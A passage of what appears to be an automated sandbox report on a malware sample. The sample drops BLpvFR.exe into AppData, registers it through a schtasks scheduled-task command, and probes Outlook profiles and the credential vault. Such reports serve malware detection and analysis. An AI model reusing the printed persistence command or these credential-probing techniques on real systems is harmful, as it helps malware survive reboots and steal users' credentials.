                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: jKqPSehspS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: jKqPSehspS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 0_2_0150EE60 push esp; iretd 0_2_0150EE61
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_01260C6D push edi; retf 9_2_01260C7A
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_00D0EE60 push esp; iretd 10_2_00D0EE61
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_00D0FCB8 push esp; retf 10_2_00D0FCBE
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_06FF9EAF push ebp; retf 10_2_06FF9EBE
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_06FF9E18 push ebp; retf 10_2_06FF9E26
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_06FF17F6 push es; retf 10_2_06FF1804
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_01280C6D push edi; retf 14_2_01280C7A
                    Source: jKqPSehspS.exeStatic PE information: section name: .text entropy: 7.794593073066602
                    Source: BLpvFR.exe.0.drStatic PE information: section name: .text entropy: 7.794593073066602
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile created: C:\Users\user\AppData\Roaming\BLpvFR.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
